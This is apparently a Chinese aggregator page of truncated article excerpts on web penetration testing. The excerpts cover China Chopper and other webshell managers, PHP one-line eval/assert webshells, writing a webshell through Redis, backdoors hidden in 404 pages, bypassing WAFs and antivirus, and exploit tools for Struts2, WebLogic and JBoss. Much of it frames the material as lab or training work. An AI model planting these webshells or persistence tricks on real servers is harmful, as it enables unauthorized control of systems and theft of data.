PHP菜刀工具WebHandler】的更多相关文章

PHP菜刀工具WebHandler   在Web渗透测试中,后台代码如果包含系统命令执行功能,并以用户提交的数据作为参数,就带来潜在的安全隐患.Kali Linux提供一款PHP菜单工具WebHandler.该工具针对PHP Web应用,可以利用PHP自带的system.passthru.exec函数功能.安全人员可以通过注入的方式,构建对应的代码,然后建立Shell连接.该工具不仅支持系统命令,还提供以@开始的专有的命令,用于执行渗透任务,如获取系统信息,下载服务器文件.爆破数据库密码.…
2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.WebShell的特点 二.渗透工具简介 1.中国菜刀 2.御剑后台扫描工具 三.web应用程序配置 四.练习:利用DVWA文件上传漏洞获取WebShell权限 五.中国菜刀原理剖析 1.目录显示 2.文件上传 3.虚拟终端 六.浅析如何绕过WAF 写在最后:WebShell实践总结及本学期学习感想 附…
前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类. 内容目录: - 构造文件包含漏洞- 隐蔽性脚本木马- 构造sql注入点 正文 0x01 构造文件包含漏洞 >**本部分概览:**> * 基本的文件包含姿势> * 制作图片马> * 构造文件包含漏洞 - **PHP文件包含漏洞介绍** 首先,我们来介绍下何为文件包含漏洞.严格来说,文件包含漏洞是`代码注入`的一种.其原理就是注入一段用户能控制的脚本或代码,并让服务端执行.`代码注入`的典型代表就是…
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提取码:q6zo 一.主机发现(nmap/netdiscover) netdiscover -i eth0 -r 192.168.10.0/24 nmap 192.168.10.0/24 -sn 二.端口扫描(masscan/nmap) 根据上面主机发现得到的主机,然后依次对每个主机进行快速端口扫描,…
强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head…
一.SQL Inject 漏洞原理概述 1.1 什么是数据库注入漏洞     数据库注入漏洞,主要是开发人员在构建代码的时候,没有对用户输入的值的边界进行安全的考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞. 1.2 SQL Inject漏洞的攻击流程 (1)第一步:注入点检测     自动方式:使用web漏洞扫描工具,自动进行注入点发现     手动方式:手工构造SQL Inject测试语句进行注入点发现 (2)第二步:…
File Upload 1. 题目 File Upload,即文件上传漏洞,通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache.Tomcat.Nginx等都曝出过文件上传漏洞. 2. Low a. 代码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // 这段代码是有关文件上传之后的位置的.basename函数返回路径中的文件名部分.…
  (1)在redis管理工具内写入木马并保存: 输入命令行: config set dbfilename shell.php set shell "<?php @assert($_POST[key]);?>" save (2)此时我们再使用菜刀工具进行连接 (3)木马直接就能成功被菜刀连接执行…
一.获取Mysql登录账号和密码 1.数据库提权需要知道数据库的账号密码.以及它的配置文件,一般配置文件都在网站的根目录下,这些配置文件命名有鲜明的特征,如:conn.config.data.sql.common.inc等等 以上这些文件都有包含连接数据库的信息,包括连接账号,密码,数据库名等等, 2.如果在这些文件里找不到需要连接数据库的信息,可以到数据库的安装目录下找,默认目录为:C:\phpStudy2016\MySQL\data\mysql,在此目录下找到user.myd文件,里面记录了…
上面这问题问得好  1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503    注意我说的是404或503不是403(要是403换个css/img等目录或许可以)    但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?5 或者说目标站点页面是XX语言,实施水坑,修改代码保…
0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了. 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ 1 菜刀,他是一款专业的网站管理工具 一.网站管理模块 (1)放在网站上的脚本程序分两种 1.1)“一句话(Eval)”: PHP, ASP, AS…
0x00 各种奇葩符号 现在基本上没啥用了,毕竟几年前的小玩意儿 /;.xxx.asp;.jpg /;.asp/.jpg 像这种各位看官可以忽略了,毕竟某狗和某盾也不是吃干饭的,写出来只是为了纪念一下 ),抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 code: <% JmStr=Replace(Request.Form,"$_POST","$_REQUEST") JmStr=Replace(JmStr,"…
首先解释一下为什么要做这个玩意:众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来 Jscript市场很低,遇到的.net站基本都是C#.新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接 出局.如果不能提权的话,那么过一段时间再打开往往面临的是大大的404.综上,利用.net会加载bin目录中的类库的特点和命名空间这个神奇 的东西编写了这个程序,将文件放在bin目录并在文件中插入调用代码即可.可能你会说放在bi…
0×00前言 之前用过几款webshell工具,有B/C的也有C/S的,有的只能用于php或者aspx,当然个人用得最多.觉得用得舒服的也只有菜刀了. 但是毕竟菜刀是好几年之前的产物了,而且也已经停止更新了,用得久了也发现一些问题,但又不好解决.去年的年底,自己突然有了个想法,自己要写一个 webshell工具,工具的自定义要最大化,自由度也要最高.(我并不认为这是在重复造轮子,很多时候,自己写个东西出来比仅仅懂得原理学到的东西要多 得多.) 0×01软件介绍 Altman基于.Net4.0开发…
Kali Linux Web后门工具 Kali的web后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCoo(Web Backdoor Cookie) WeBaCoo是一款隐蔽的脚本类Web后门工具.借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端.WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie.这就意味着多数的杀毒软件.网络入侵检测/防御系统.网络防火墙和应用程序防火墙都无法检测到后门的存在. 1.WeBaCoo有两种操…
http://qqhack8.blog.163.com/blog/static/114147985201126105626755/ 这是我2011年的东西了,当时用此方法可免杀很多马,至今依然有很大的用处 比如有一些WebShell,特别菜刀无法直接上传exe文件时(当然该工具可传任意文件) 可通过此方法向目标上传任意文件(菜刀下载功能不可用或没VPS做WEB下载的情况) 现在依旧可用于类似奇葩环境,特别是S2环境很多时候仅能上传文本 [原创]3KB大小 EXE转BAT 工具原理以及编写思路 2…
weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享(链接: https://pan.baidu.com/s/1SF_0oSN_lar9dkTWOZKDDw 密码: zfrd) oracle提权执行命令工具oracleshell 工具分享(链接: https://pan.baidu.com/s/1boILwEr 密码: 3h13) ...... udf…
# 漏洞解析: config/config.inc.php $langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'"); if(!$langoks)die('No data in the database,please reinstall.'); if(!$langoks[useok]&&!$metinfoadminok)okinfo('../404.html'); if(count(…
工具: K8_FuckOneShell 20161224编译: VS2012  C# (.NET Framework v4.0)组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2016/12/24 13:32:04 简介: 采用多参数同时提交1000密码,本地内网测试10万/秒,3400万分别5-10分钟不等支持ASP/PHP/ASPX/JSP/CFM/等菜刀自定义一句话,无视GPC模式的PHP爆破 图片: 功能: 2…
工具: K8 Struts2 Exploit组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2014/7/31 10:24:56 简介: K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)Struts2漏洞检测工具   Struts2漏洞测试工具  K8 struts2 exploit Test  Struts2 GetShell支持漏洞…
这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处.中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品.日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程. 分析 中国菜刀的客户端可在www.maicaidao.com下载到. Web shell (CnC) Client MD5 caidao.exe 5001ef50c7e869253a7…
开源Webshell利用工具--Altman keepwn @ 工具 2014-06-04 共 6114 人围观,发现 43 个不明物体收藏该文 Altman,the webshell tool,自己写的一款开源软件. 0×00前言 之前用过几款webshell工具,有B/C的也有C/S的,有的只能用于php或者aspx,当然个人用得最多.觉得用得舒服的也只有菜刀了. 但是毕竟菜刀是好几年之前的产物了,而且也已经停止更新了,用得久了也发现一些问题,但又不好解决.去年的年底,自己突然有了个想法,自…
这里以eval为例 我们知道, php中的eval能把字符串当代码执行: eval('phpcode'); 注意, 这里的代码要有分号结尾, 我们测试: 我们创建一个最简单的SHELL: <?php eval($_POST['a']); 在post数据位置发送: a=phpinfo() 可以看到phpinfo()并没有执行. 原来原因是要加 ; 号结速一个语句, 像php语法一样, 语句后面要加 ; 号. 这里还有一个问题就是, 输入的  a=phpinfo();  不需要用单或双引号括起来:…
Axis2: Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构). 昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接.看起来别人可以修改response类型,但是我没成功.利用之前发的Cat小工具打包成aar就可以玩了. axis2管理登陆默认配置了用户名为admin,密码axis2: axis2管理后台: 想要deploy 自己的应用需要先打成对应的aar.jar包.用eclipse安装axis2插件. S…
什么叫做一句话木马:     就是一句简单的脚本语言,一句话木马分为Php,asp,aspx等 中国菜刀:   连接一句话木马的工具 实验的目的:  通过一句话木马来控制我们的服务器,拿到webshell. 实验环境说明:   上传一句话木马到网站的根目录下: 然后通过中国菜刀连接: 获取wensell ,文件目录等等:…
漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://g…
简单工具:明小子,阿d注入工具,namp,穿山甲,御剑,旁注 漏洞扫描工具:appscan .awvs.nbsi 端口扫描工具:nessus.namp.天镜脆弱性扫描与管理系统 数据库备份工具:中国菜刀 www.cmd5.com  md5解码网站 突破防注入工具:cookie注入中转 注入工具:hdsi http://www.uzzf.com/soft/37310.html web安全攻防视频目录: 2.思路.3.简单的工具使用.5.谷歌黑客语法.6.robots.txt.7.渗透必会端口.8.…
漏洞及渗透练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://github.com/Medicean/VulApps dvwa漏洞练习平台: https://gi…
前言 逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了 问题 如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示 解决 用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013.html 知道了本质就简单了,菜刀这个软件之所以经典就是因为它的灵活性很强,修改下配置文件即可 PS:…
使用工具: 中国菜刀 一句话php木马 <?php @eval($_POST['123456']);?> 第一步,将php木马上传至服务器,为了方便我就直接在服务器上建立. [root@proxy html]# vim .php <?php @eval($_POST[']);?> 第二步,打开中国菜刀配置,密码为123456 点击确定之后,无其他问题,即可成功. 右键点击该链接,选择文件管理,即可查看到服务器的文件目录 接下来..不用说了…